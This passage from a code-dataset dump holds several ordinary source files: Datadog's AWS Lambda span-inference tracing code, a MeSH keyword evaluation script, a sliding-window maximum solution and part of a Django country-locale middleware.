dd trace root context to: %s\",\n (span_context.trace_id, span_context.span_id),\n )\n\n\ndef create_inferred_span(\n event,\n context,\n event_source: _EventSource = None,\n decode_authorizer_context: bool = True,\n):\n if event_source is None:\n event_source = parse_event_source(event)\n try:\n if event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.API_GATEWAY\n ):\n logger.debug(\"API Gateway event detected. Inferring a span\")\n return create_inferred_span_from_api_gateway_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.LAMBDA_FUNCTION_URL):\n logger.debug(\"Function URL event detected. Inferring a span\")\n return create_inferred_span_from_lambda_function_url_event(event, context)\n elif event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.HTTP_API\n ):\n logger.debug(\"HTTP API event detected. Inferring a span\")\n return create_inferred_span_from_http_api_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(\n EventTypes.API_GATEWAY, subtype=EventSubtypes.WEBSOCKET\n ):\n logger.debug(\"API Gateway Websocket event detected. Inferring a span\")\n return create_inferred_span_from_api_gateway_websocket_event(\n event, context, decode_authorizer_context\n )\n elif event_source.equals(EventTypes.SQS):\n logger.debug(\"SQS event detected. Inferring a span\")\n return create_inferred_span_from_sqs_event(event, context)\n elif event_source.equals(EventTypes.SNS):\n logger.debug(\"SNS event detected. Inferring a span\")\n return create_inferred_span_from_sns_event(event, context)\n elif event_source.equals(EventTypes.KINESIS):\n logger.debug(\"Kinesis event detected. Inferring a span\")\n return create_inferred_span_from_kinesis_event(event, context)\n elif event_source.equals(EventTypes.DYNAMODB):\n logger.debug(\"Dynamodb event detected. Inferring a span\")\n return create_inferred_span_from_dynamodb_event(event, context)\n elif event_source.equals(EventTypes.S3):\n logger.debug(\"S3 event detected. Inferring a span\")\n return create_inferred_span_from_s3_event(event, context)\n elif event_source.equals(EventTypes.EVENTBRIDGE):\n logger.debug(\"Eventbridge event detected. Inferring a span\")\n return create_inferred_span_from_eventbridge_event(event, context)\n except Exception as e:\n logger.debug(\n \"Unable to infer span. Detected type: %s. 
Reason: %s\",\n            event_source.to_string(),\n            e,\n        )\n        return None\n    logger.debug(\"Unable to infer a span: unknown event type\")\n    return None\n\n\ndef create_service_mapping(val):\n    new_service_mapping = {}\n    for entry in val.split(\",\"):\n        parts = entry.split(\":\")\n        if len(parts) == 2:\n            key = parts[0].strip()\n            value = parts[1].strip()\n            if key != value and key and value:\n                new_service_mapping[key] = value\n    return new_service_mapping\n\n\ndef determine_service_name(service_mapping, specific_key, generic_key, default_value):\n    service_name = service_mapping.get(specific_key)\n    if service_name is None:\n        service_name = service_mapping.get(generic_key, default_value)\n    return service_name\n\n\nservice_mapping = {}\n# Initialization code\nservice_mapping_str = os.getenv(\"DD_SERVICE_MAPPING\", \"\")\nservice_mapping = create_service_mapping(service_mapping_str)\n\n\ndef create_inferred_span_from_lambda_function_url_event(event, context):\n    request_context = event.get(\"requestContext\")\n    api_id = request_context.get(\"apiId\")\n    domain = request_context.get(\"domainName\")\n    service_name = determine_service_name(service_mapping, api_id, \"lambda_url\", domain)\n    method = request_context.get(\"http\", {}).get(\"method\")\n    path = request_context.get(\"http\", {}).get(\"path\")\n    resource = \"{0} {1}\".format(method, path)\n    tags = {\n        \"operation_name\": \"aws.lambda.url\",\n        \"http.url\": domain + path,\n        \"endpoint\": path,\n        \"http.method\": method,\n        \"resource_names\": domain + path,\n        \"request_id\": context.aws_request_id,\n    }\n    request_time_epoch = request_context.get(\"timeEpoch\")\n    args = {\n        \"service\": service_name,\n        \"resource\": resource,\n        \"span_type\": \"http\",\n    }\n    tracer.set_tags(\n        {\"_dd.origin\": \"lambda\"}\n    )  # function urls don't count as lambda_inferred,\n    # because they're in the same service as the inferring lambda function\n    span = tracer.trace(\"aws.lambda.url\", **args)\n    InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n    if span:\n        span.set_tags(tags)\n        span.start = request_time_epoch / 1000\n    return span\n\n\ndef is_api_gateway_invocation_async(event):\n    return event.get(\"headers\", {}).get(\"X-Amz-Invocation-Type\") == \"Event\"\n\n\ndef insert_upstream_authorizer_span(\n    kwargs_to_start_span, other_tags_for_span, start_time_ns, finish_time_ns\n):\n    \"\"\"Insert the authorizer span.\n    Without this: parent span --child-> inferred span\n    With this insertion: parent span --child-> upstreamAuthorizerSpan --child-> inferred span\n\n    Args:\n        kwargs_to_start_span (Dict): the same keyword arguments used for the inferred span\n        other_tags_for_span (Dict): the same tag keyword arguments used for the inferred span\n        start_time_ns (int): the start time of the span in nanoseconds\n        finish_time_ns (int): the finish time of the span in nanoseconds\n    \"\"\"\n    trace_ctx = tracer.current_trace_context()\n    upstream_authorizer_span = tracer.trace(\n        \"aws.apigateway.authorizer\", **kwargs_to_start_span\n    )\n    upstream_authorizer_span.set_tags(other_tags_for_span)\n    upstream_authorizer_span.set_tag(\"operation_name\", \"aws.apigateway.authorizer\")\n    # always sync for the authorizer invocation\n    InferredSpanInfo.set_tags_to_span(upstream_authorizer_span, synchronicity=\"sync\")\n    upstream_authorizer_span.start_ns = int(start_time_ns)\n    upstream_authorizer_span.finish(finish_time_ns / 1e9)\n    # trace context needs to be set again as it is reset by finish()\n    tracer.context_provider.activate(trace_ctx)\n    return upstream_authorizer_span\n\n\ndef 
process_injected_data(event, request_time_epoch_ms, args, tags):\n \"\"\"\n This covers the ApiGateway RestAPI and Websocket cases. It doesn't cover Http API cases.\n \"\"\"\n injected_authorizer_data = get_injected_authorizer_data(event, False)\n if injected_authorizer_data:\n try:\n start_time_ns = int(\n injected_authorizer_data.get(Headers.Parent_Span_Finish_Time)\n )\n finish_time_ns = (\n request_time_epoch_ms\n + (\n int(\n event[\"requestContext\"][\"authorizer\"].get(\n \"integrationLatency\", 0\n )\n )\n )\n ) * 1e6\n upstream_authorizer_span = insert_upstream_authorizer_span(\n args, tags, start_time_ns, finish_time_ns\n )\n return upstream_authorizer_span, finish_time_ns\n except Exception as e:\n logger.debug(\n \"Unable to insert authorizer span. Continue to generate the main span.\\\n Reason: %s\",\n e,\n )\n return None, None\n else:\n return None, None\n\n\ndef create_inferred_span_from_api_gateway_websocket_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\")\n endpoint = request_context.get(\"routeKey\")\n api_id = request_context.get(\"apiId\")\n\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n tags = {\n \"operation_name\": \"aws.apigateway.websocket\",\n \"http.url\": domain + endpoint,\n \"endpoint\": endpoint,\n \"resource_names\": endpoint,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n \"request_id\": context.aws_request_id,\n \"connection_id\": request_context.get(\"connectionId\"),\n \"event_type\": request_context.get(\"eventType\"),\n \"message_direction\": request_context.get(\"messageDirection\"),\n }\n request_time_epoch_ms = int(request_context.get(\"requestTimeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": endpoint,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n upstream_authorizer_span = None\n finish_time_ns = None\n if decode_authorizer_context:\n upstream_authorizer_span, finish_time_ns = process_injected_data(\n event, request_time_epoch_ms, args, tags\n )\n span = tracer.trace(\"aws.apigateway.websocket\", **args)\n if span:\n span.set_tags(tags)\n span.start_ns = int(\n finish_time_ns\n if finish_time_ns is not None\n else request_time_epoch_ms * 1e6\n )\n if upstream_authorizer_span:\n span.parent_id = upstream_authorizer_span.span_id\n return span\n\n\ndef create_inferred_span_from_api_gateway_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\", \"\")\n api_id = request_context.get(\"apiId\")\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n method = event.get(\"httpMethod\")\n path = event.get(\"path\")\n resource = \"{0} {1}\".format(method, path)\n tags = {\n \"operation_name\": \"aws.apigateway.rest\",\n \"http.url\": domain + path,\n \"endpoint\": path,\n \"http.method\": method,\n \"resource_names\": resource,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n \"request_id\": context.aws_request_id,\n }\n request_time_epoch_ms = 
int(request_context.get(\"requestTimeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": resource,\n \"span_type\": \"http\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n upstream_authorizer_span = None\n finish_time_ns = None\n if decode_authorizer_context:\n upstream_authorizer_span, finish_time_ns = process_injected_data(\n event, request_time_epoch_ms, args, tags\n )\n span = tracer.trace(\"aws.apigateway\", **args)\n if span:\n span.set_tags(tags)\n # start time pushed by the inserted authorizer span\n span.start_ns = int(\n finish_time_ns\n if finish_time_ns is not None\n else request_time_epoch_ms * 1e6\n )\n if upstream_authorizer_span:\n span.parent_id = upstream_authorizer_span.span_id\n return span\n\n\ndef create_inferred_span_from_http_api_event(\n event, context, decode_authorizer_context: bool = True\n):\n request_context = event.get(\"requestContext\")\n domain = request_context.get(\"domainName\")\n api_id = request_context.get(\"apiId\")\n service_name = determine_service_name(\n service_mapping, api_id, \"lambda_api_gateway\", domain\n )\n method = request_context.get(\"http\", {}).get(\"method\")\n path = event.get(\"rawPath\")\n resource = \"{0} {1}\".format(method, path)\n tags = {\n \"operation_name\": \"aws.httpapi\",\n \"endpoint\": path,\n \"http.url\": domain + path,\n \"http.method\": request_context.get(\"http\", {}).get(\"method\"),\n \"http.protocol\": request_context.get(\"http\", {}).get(\"protocol\"),\n \"http.source_ip\": request_context.get(\"http\", {}).get(\"sourceIp\"),\n \"http.user_agent\": request_context.get(\"http\", {}).get(\"userAgent\"),\n \"resource_names\": resource,\n \"request_id\": context.aws_request_id,\n \"apiid\": api_id,\n \"apiname\": api_id,\n \"stage\": request_context.get(\"stage\"),\n }\n request_time_epoch_ms = int(request_context.get(\"timeEpoch\"))\n if is_api_gateway_invocation_async(event):\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n else:\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"sync\")\n args = {\n \"service\": service_name,\n \"resource\": resource,\n \"span_type\": \"http\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n inferred_span_start_ns = request_time_epoch_ms * 1e6\n if decode_authorizer_context:\n injected_authorizer_data = get_injected_authorizer_data(event, True)\n if injected_authorizer_data:\n inferred_span_start_ns = injected_authorizer_data.get(\n Headers.Parent_Span_Finish_Time\n )\n span = tracer.trace(\"aws.httpapi\", **args)\n if span:\n span.set_tags(tags)\n span.start_ns = int(inferred_span_start_ns)\n return span\n\n\ndef create_inferred_span_from_sqs_event(event, context):\n trace_ctx = tracer.current_trace_context()\n\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n queue_name = event_source_arn.split(\":\")[-1]\n service_name = determine_service_name(\n service_mapping, queue_name, \"lambda_sqs\", \"sqs\"\n )\n tags = {\n \"operation_name\": \"aws.sqs\",\n \"resource_names\": queue_name,\n \"queuename\": queue_name,\n \"event_source_arn\": event_source_arn,\n \"receipt_handle\": event_record.get(\"receiptHandle\"),\n \"sender_id\": event_record.get(\"attributes\", {}).get(\"SenderId\"),\n }\n InferredSpanInfo.set_tags(tags, 
tag_source=\"self\", synchronicity=\"async\")\n request_time_epoch = event_record.get(\"attributes\", {}).get(\"SentTimestamp\")\n args = {\n \"service\": service_name,\n \"resource\": queue_name,\n \"span_type\": \"web\",\n }\n start_time = int(request_time_epoch) / 1000\n\n upstream_span = None\n if \"body\" in event_record:\n body_str = event_record.get(\"body\", {})\n try:\n body = json.loads(body_str)\n\n # logic to deal with SNS => SQS event\n if body.get(\"Type\", \"\") == \"Notification\" and \"TopicArn\" in body:\n logger.debug(\"Found SNS message inside SQS event\")\n upstream_span = create_inferred_span_from_sns_event(\n create_sns_event(body), context\n )\n upstream_span.finish(finish_time=start_time)\n\n # EventBridge => SQS\n elif body.get(\"detail\"):\n detail = body.get(\"detail\")\n if detail.get(\"_datadog\"):\n logger.debug(\"Found an EventBridge message inside SQS event\")\n upstream_span = create_inferred_span_from_eventbridge_event(\n body, context\n )\n upstream_span.finish(finish_time=start_time)\n\n except Exception as e:\n logger.debug(\n \"Unable to create upstream span from SQS message, with error %s\" % e\n )\n pass\n\n # trace context needs to be set again as it is reset\n # when sns_span.finish executes\n tracer.context_provider.activate(trace_ctx)\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.sqs\", **args)\n if span:\n span.set_tags(tags)\n span.start = start_time\n if upstream_span:\n span.parent_id = upstream_span.span_id\n\n return span\n\n\ndef create_inferred_span_from_sns_event(event, context):\n event_record = get_first_record(event)\n sns_message = event_record.get(\"Sns\")\n topic_arn = event_record.get(\"Sns\", {}).get(\"TopicArn\")\n topic_name = topic_arn.split(\":\")[-1]\n service_name = determine_service_name(\n service_mapping, topic_name, \"lambda_sns\", \"sns\"\n )\n tags = {\n \"operation_name\": \"aws.sns\",\n \"resource_names\": topic_name,\n \"topicname\": topic_name,\n \"topic_arn\": topic_arn,\n \"message_id\": sns_message.get(\"MessageId\"),\n \"type\": sns_message.get(\"Type\"),\n }\n\n # Subject not available in SNS => SQS scenario\n if \"Subject\" in sns_message and sns_message[\"Subject\"]:\n tags[\"subject\"] = sns_message.get(\"Subject\")\n\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n sns_dt_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n timestamp = event_record.get(\"Sns\", {}).get(\"Timestamp\")\n dt = datetime.strptime(timestamp, sns_dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": topic_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.sns\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_inferred_span_from_kinesis_event(event, context):\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n event_id = event_record.get(\"eventID\")\n stream_name = event_source_arn.split(\":\")[-1]\n shard_id = event_id.split(\":\")[0]\n service_name = determine_service_name(\n service_mapping, stream_name, \"lambda_kinesis\", \"kinesis\"\n )\n tags = {\n \"operation_name\": \"aws.kinesis\",\n \"resource_names\": stream_name,\n \"streamname\": stream_name,\n \"shardid\": shard_id,\n \"event_source_arn\": event_source_arn,\n \"event_id\": event_id,\n \"event_name\": event_record.get(\"eventName\"),\n \"event_version\": event_record.get(\"eventVersion\"),\n \"partition_key\": 
event_record.get(\"kinesis\", {}).get(\"partitionKey\"),\n }\n InferredSpanInfo.set_tags(tags, tag_source=\"self\", synchronicity=\"async\")\n request_time_epoch = event_record.get(\"kinesis\", {}).get(\n \"approximateArrivalTimestamp\"\n )\n\n args = {\n \"service\": service_name,\n \"resource\": stream_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.kinesis\", **args)\n if span:\n span.set_tags(tags)\n span.start = request_time_epoch\n return span\n\n\ndef create_inferred_span_from_dynamodb_event(event, context):\n event_record = get_first_record(event)\n event_source_arn = event_record.get(\"eventSourceARN\")\n table_name = event_source_arn.split(\"/\")[1]\n service_name = determine_service_name(\n service_mapping, table_name, \"lambda_dynamodb\", \"dynamodb\"\n )\n dynamodb_message = event_record.get(\"dynamodb\")\n tags = {\n \"operation_name\": \"aws.dynamodb\",\n \"resource_names\": table_name,\n \"tablename\": table_name,\n \"event_source_arn\": event_source_arn,\n \"event_id\": event_record.get(\"eventID\"),\n \"event_name\": event_record.get(\"eventName\"),\n \"event_version\": event_record.get(\"eventVersion\"),\n \"stream_view_type\": dynamodb_message.get(\"StreamViewType\"),\n \"size_bytes\": str(dynamodb_message.get(\"SizeBytes\")),\n }\n InferredSpanInfo.set_tags(tags, synchronicity=\"async\", tag_source=\"self\")\n request_time_epoch = event_record.get(\"dynamodb\", {}).get(\n \"ApproximateCreationDateTime\"\n )\n args = {\n \"service\": service_name,\n \"resource\": table_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.dynamodb\", **args)\n if span:\n span.set_tags(tags)\n\n span.start = int(request_time_epoch)\n return span\n\n\ndef create_inferred_span_from_s3_event(event, context):\n event_record = get_first_record(event)\n bucket_name = event_record.get(\"s3\", {}).get(\"bucket\", {}).get(\"name\")\n service_name = determine_service_name(\n service_mapping, bucket_name, \"lambda_s3\", \"s3\"\n )\n tags = {\n \"operation_name\": \"aws.s3\",\n \"resource_names\": bucket_name,\n \"event_name\": event_record.get(\"eventName\"),\n \"bucketname\": bucket_name,\n \"bucket_arn\": event_record.get(\"s3\", {}).get(\"bucket\", {}).get(\"arn\"),\n \"object_key\": event_record.get(\"s3\", {}).get(\"object\", {}).get(\"key\"),\n \"object_size\": str(event_record.get(\"s3\", {}).get(\"object\", {}).get(\"size\")),\n \"object_etag\": event_record.get(\"s3\", {}).get(\"object\", {}).get(\"eTag\"),\n }\n InferredSpanInfo.set_tags(tags, synchronicity=\"async\", tag_source=\"self\")\n dt_format = \"%Y-%m-%dT%H:%M:%S.%fZ\"\n timestamp = event_record.get(\"eventTime\")\n dt = datetime.strptime(timestamp, dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": bucket_name,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.s3\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_inferred_span_from_eventbridge_event(event, context):\n source = event.get(\"source\")\n service_name = determine_service_name(\n service_mapping, source, \"lambda_eventbridge\", \"eventbridge\"\n )\n tags = {\n \"operation_name\": \"aws.eventbridge\",\n \"resource_names\": source,\n \"detail_type\": event.get(\"detail-type\"),\n }\n InferredSpanInfo.set_tags(\n tags,\n synchronicity=\"async\",\n tag_source=\"self\",\n )\n dt_format = 
\"%Y-%m-%dT%H:%M:%SZ\"\n timestamp = event.get(\"time\")\n dt = datetime.strptime(timestamp, dt_format)\n\n args = {\n \"service\": service_name,\n \"resource\": source,\n \"span_type\": \"web\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.eventbridge\", **args)\n if span:\n span.set_tags(tags)\n span.start = dt.replace(tzinfo=timezone.utc).timestamp()\n return span\n\n\ndef create_function_execution_span(\n context,\n function_name,\n is_cold_start,\n is_proactive_init,\n trace_context_source,\n merge_xray_traces,\n trigger_tags,\n parent_span=None,\n):\n tags = {}\n if context:\n function_arn = (context.invoked_function_arn or \"\").lower()\n tk = function_arn.split(\":\")\n function_arn = \":\".join(tk[0:7]) if len(tk) > 7 else function_arn\n function_version = tk[7] if len(tk) > 7 else \"$LATEST\"\n tags = {\n \"cold_start\": str(is_cold_start).lower(),\n \"function_arn\": function_arn,\n \"function_version\": function_version,\n \"request_id\": context.aws_request_id,\n \"resource_names\": context.function_name,\n \"functionname\": context.function_name.lower()\n if context.function_name\n else None,\n \"datadog_lambda\": datadog_lambda_version,\n \"dd_trace\": ddtrace_version,\n \"span.name\": \"aws.lambda\",\n }\n if is_proactive_init:\n tags[\"proactive_initialization\"] = str(is_proactive_init).lower()\n if trace_context_source == TraceContextSource.XRAY and merge_xray_traces:\n tags[\"_dd.parent_source\"] = trace_context_source\n tags.update(trigger_tags)\n args = {\n \"service\": \"aws.lambda\",\n \"resource\": function_name,\n \"span_type\": \"serverless\",\n }\n tracer.set_tags({\"_dd.origin\": \"lambda\"})\n span = tracer.trace(\"aws.lambda\", **args)\n if span:\n span.set_tags(tags)\n if parent_span:\n span.parent_id = parent_span.span_id\n return span\n\n\ndef mark_trace_as_error_for_5xx_responses(context, status_code, span):\n if len(status_code) == 3 and status_code.startswith(\"5\"):\n submit_errors_metric(context)\n if span:\n span.error = 1\n\n\nclass InferredSpanInfo(object):\n BASE_NAME = \"_inferred_span\"\n SYNCHRONICITY = f\"{BASE_NAME}.synchronicity\"\n TAG_SOURCE = f\"{BASE_NAME}.tag_source\"\n\n @staticmethod\n def set_tags(\n tags: Dict[str, str],\n synchronicity: Optional[Literal[\"sync\", \"async\"]] = None,\n tag_source: Optional[Literal[\"labmda\", \"self\"]] = None,\n ):\n if synchronicity is not None:\n tags[InferredSpanInfo.SYNCHRONICITY] = str(synchronicity)\n if tag_source is not None:\n tags[InferredSpanInfo.TAG_SOURCE] = str(tag_source)\n\n @staticmethod\n def set_tags_to_span(\n span: Span,\n synchronicity: Optional[Literal[\"sync\", \"async\"]] = None,\n tag_source: Optional[Literal[\"labmda\", \"self\"]] = None,\n ):\n if synchronicity is not None:\n span.set_tags({InferredSpanInfo.SYNCHRONICITY: synchronicity})\n if tag_source is not None:\n span.set_tags({InferredSpanInfo.TAG_SOURCE: str(tag_source)})\n\n @staticmethod\n def is_async(span: Span) -> bool:\n if not span:\n return False\n try:\n return span.get_tag(InferredSpanInfo.SYNCHRONICITY) == \"async\"\n except Exception as e:\n logger.debug(\n \"Unabled to read the %s tag, returning False. 
\\\n Reason: %s.\",\n InferredSpanInfo.SYNCHRONICITY,\n e,\n )\n return False\n","repo_name":"DataDog/datadog-lambda-python","sub_path":"datadog_lambda/tracing.py","file_name":"tracing.py","file_ext":"py","file_size_in_byte":49336,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"31"} +{"seq_id":"23738505629","text":"#!/usr/bin/env python3\nimport sys\nimport math\nimport logging\nimport argparse\nfrom random import choice\nfrom itertools import permutations\n\nfrom scipy.stats import normaltest\nfrom scipy.special import ndtr\n\n\ndef check_intersection(elements, mesh):\n return len({el for el in elements if el in mesh})\n\ndef get_random_elements(corpus, number):\n if len(corpus) < number:\n raise Exception(\"Corpus is smaller than required number of elements for evaluation\")\n\n elements = set()\n\n # add a random keyword until there are the required number\n # keywords is a set so there will be no duplicates\n while len(elements) < number:\n elements.add(choice(corpus))\n\n return elements\n\n# this is used to convert mesh into a suitable set for 'in' checking\n# millions of times for bigrams. for each item in mesh, if the item \n# consists of 2 or more words, then all 2-length permutations are added \n# to the set\n#\n# NOTE: this is not memory efficient, but fine for now\ndef get_bigram_set(mesh):\n mesh_out = set()\n\n for element in mesh:\n element = element.split()\n \n if len(element) > 1:\n # dedup\n element = list(dict.fromkeys(element))\n \n for permutation in permutations(element, 2):\n mesh_out.add(\" \".join(permutation))\n\n return mesh_out\n\n# NOTE: currently this is just going to assume keywords/bigrams based \n# on the split length\ndef run_trials(corpus, mesh, num_elements, num_trials):\n logger = logging.getLogger(__name__)\n\n random_intersect_results = []\n \n for _ in range(num_trials):\n elements = get_random_elements(corpus, num_elements)\n random_intersect_results.append(check_intersection(elements, mesh))\n \n return random_intersect_results\n \ndef compute_p_val(method_intersect_len, random_intersect_results):\n logger = logging.getLogger(__name__)\n\n # check for normality of random_intersect_results\n k2, p = normaltest(random_intersect_results)\n logger.info(f\"normaltest p-val: {p}\")\n \n x_bar = sum(random_intersect_results) / len(random_intersect_results)\n \n numer = sum([(x - x_bar) ** 2 for x in random_intersect_results])\n std_dev = math.sqrt(numer / (len(random_intersect_results) - 1))\n \n if std_dev > 0:\n z = (method_intersect_len - x_bar) / std_dev\n else:\n z = 0\n\n return 1 - ndtr(z)\n\ndef load_mesh(mesh_fp):\n with open(mesh_fp, encoding=\"ISO-8859-1\", mode=\"r\") as handle:\n mesh = [line.strip(\"\\n\") for line in handle]\n \n # mesh should be a set because later there are millions of checks to see\n # if an element is in the data structure\n return set(mesh)\n\ndef load_list(fp):\n items = []\n \n with open(fp, \"r\") as handle: \n for line in handle:\n line = line.strip(\"\\n\")\n if line:\n items.append(line)\n \n return items\n\ndef initialize_logger(debug=False, quiet=False):\n level = logging.INFO\n if debug:\n level = logging.DEBUG\n\n # Set up logging\n logger = logging.getLogger(__name__)\n logger.setLevel(level)\n handler = logging.FileHandler(\"eval.log\")\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n if not quiet:\n handler = logging.StreamHandler(sys.stdout)\n 
handler.setLevel(level)\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n \n return logger\n\ndef get_args():\n logger = logging.getLogger(__name__)\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", \"--corpus\", help=\"Path to input corpus file\", required=True)\n parser.add_argument(\"-r\", \"--result\", help=\"Path to results from our method\", required=True)\n parser.add_argument(\"-m\", \"--mesh\", help=\"Path to lemmatized MeSH file\", required=True)\n parser.add_argument(\"-t\", \"--trials\", help=\"Number of random trials to run, default=100000\",\n type=int, default=100000)\n \n args = parser.parse_args()\n \n # log delimiter\n logger.info(\"###############################\")\n logger.info(f\"Corpus: {args.corpus}\")\n logger.info(f\"Method results: {args.result}\")\n logger.info(f\"MeSH file: {args.mesh}\")\n logger.info(f\"Num. trials: {args.trials}\")\n\n return args\n\n# thresh is just for the experiment!!!\ndef evaluate(corpus, method_result, mesh, n_trials, thresh, verbose=True):\n if verbose:\n logger = logging.getLogger(__name__)\n \n # bigram detection\n if len(corpus[0].split()) == 2:\n if verbose:\n logger.info(\"Bigrams detected\")\n mesh = get_bigram_set(mesh)\n \n # get result metric for our method\n method_intersect_len = check_intersection(method_result, mesh)\n \n # run trials\n random_intersect_results = run_trials(corpus, mesh, len(method_result), n_trials)\n random_mean = sum(random_intersect_results) / len(random_intersect_results)\n\n p = compute_p_val(method_intersect_len, random_intersect_results)\n\n if verbose:\n logger.info(f\"Method intersect length: {method_intersect_len}\")\n logger.info(f\"Random intersect mean: {random_mean}\")\n logger.info(f\"Random intersect max: {max(random_intersect_results)}\")\n logger.info(f\"p: {p}\") \n\n return (thresh, p, method_intersect_len, len(method_result), random_mean, max(random_intersect_results))\n\nif __name__ == \"__main__\":\n logger = initialize_logger()\n\n args = get_args()\n\n # load in things\n corpus = load_list(args.corpus)\n method_results = load_list(args.result)\n mesh = load_mesh(args.mesh)\n \n _ = evaluate(corpus, method_results, mesh, args.trials, thresh=None)\n","repo_name":"wigasper/topic-hierarchy","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":5804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23341606804","text":"# -*- coding: utf-8 -*-\r\n# @Time : 2020/5/1 19:02\r\n# @Author : Shajiu\r\n# @FileName: maxInWindows.py\r\n# @Software: PyCharm\r\n# @Github :https://github.com/Shajiu\r\n\"\"\"\r\nProblem:\r\n Given an array and a sliding window size, find the maximum value in every sliding window. For example,\r\n given the input array {2,3,4,2,6,2,5,1} and window size 3, there are 6 sliding windows in total,\r\n and their maximum values are {4,4,6,6,6,5}. The 6 sliding windows over the array {2,3,4,2,6,2,5,1} are:\r\n {[2,3,4],2,6,2,5,1}, {2,[3,4,2],6,2,5,1}, {2,3,[4,2,6],2,5,1},\r\n {2,3,4,[2,6,2],5,1}, {2,3,4,2,[6,2,5],1}, {2,3,4,2,6,[2,5,1]}.\r\n\"\"\"\r\nclass Solution:\r\n def maxInWindows(self,num,size):\r\n if size<=0:\r\n return []\r\n res=[]\r\n for i in range(len(num)-size+1):\r\n res.append(max(num[i:i+size]))\r\n return res\r\n","repo_name":"Shajiu/AlgorithmBook","sub_path":"Offer_Code/Offer_Code/maxInWindows.py","file_name":"maxInWindows.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"37245778422","text":"from 
django.conf import settings\nfrom django.http import HttpResponseRedirect\nfrom django.utils.translation import LANGUAGE_SESSION_KEY\nfrom django.utils.functional import cached_property\nfrom django.core.urlresolvers import (\n get_resolver, get_script_prefix, is_valid_path\n)\nfrom .trans_country import (\n activate_country, get_country, set_country\n)\nfrom .utils import (\n get_countries_and_language, get_country_from_path, get_country_from_request\n)\nfrom .urls import CountryRegexURLResolver\n\n\nclass CountryLocaleMiddleware(object):\n response_redirect_class = HttpResponseRedirect\n\n def process_request(self, request):\n supported_country_codes = get_countries_and_language()\n country_code = get_country_from_request(request)\n\n if country_code in supported_country_codes and country_code is not None:\n activate_country(country_code)\n set_country(country_code, request)\n request.COUNTRY_CODE = country_code\n\n lang_code = supported_country_codes[country_code]\n if lang_code is not None:\n request.session[LANGUAGE_SESSION_KEY] = lang_code\n\n def process_response(self, request, response):\n country_code = get_country()\n country_from_path = get_country_from_path(request.path_info)\n if (response.status_code == 404 and not country_from_path\n and self.is_language_prefix_patterns_used):\n urlconf = getattr(request, 'urlconf', None)\n country_path = '/%s%s' % (country_code, request.path_info)\n path_valid = is_valid_path(country_path, urlconf)\n path_needs_slash = (\n not path_valid and (\n settings.APPEND_SLASH and not country_path.endswith('/')\n and is_valid_path('%s/' % country_path, urlconf)\n )\n )\n\n if path_valid or path_needs_slash:\n script_prefix = get_script_prefix()\n language_url = request.get_full_path(force_append_slash=path_needs_slash).replace(\n script_prefix,\n 